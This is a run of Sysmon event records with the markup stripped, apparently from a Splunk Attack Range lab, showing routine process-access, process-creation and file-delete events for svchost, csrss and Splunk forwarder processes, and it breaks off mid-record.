08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809623Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809622Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809621Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809620Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809619Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809618Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809617Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F74F-60EB-C579-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809616Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.771{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F74F-60EB-C579-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809615Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.772{0C1E0330-F74F-60EB-C579-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809614Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.756{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCA465E818AE0F8C8A15577A851EBFD8,SHA256=80C4B2A1388ABDBE1E4E9824D897E774CA6C36452082C352AD59A28FA61D67A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:27.351{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2240FB501E98C2688CAC18478130F6DD,SHA256=F86071FAF11EC5B9A4A0D3455D9F91718B0523C94AAB9FF7F7E9E0A8AE0C2982,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809613Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.256{0C1E0330-F74F-60EB-C479-00000000D001}28082996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809612Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.162{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E15A2F12B4DC9C33668971AE17E41DBB,SHA256=0C1A173BE6006031E7DE8383A35BC633CB1FA22FCF2E2D0587D9BE283A3BB1B2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809611Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F74F-60EB-C479-00000000D001}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809610Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809609Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809608Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809607Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809606Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809605Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809604Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809603Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809602Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809601Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F74F-60EB-C479-00000000D001}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809600Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F74F-60EB-C479-00000000D001}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809599Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.085{0C1E0330-F74F-60EB-C479-00000000D001}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809643Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.771{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52B901220FF250C9D8F1730927FF92C5,SHA256=B94BA6F6AB97A73A3BFA15C036C4FD135D61A9CE820E33CB830B5D40241B4E0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:28.366{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 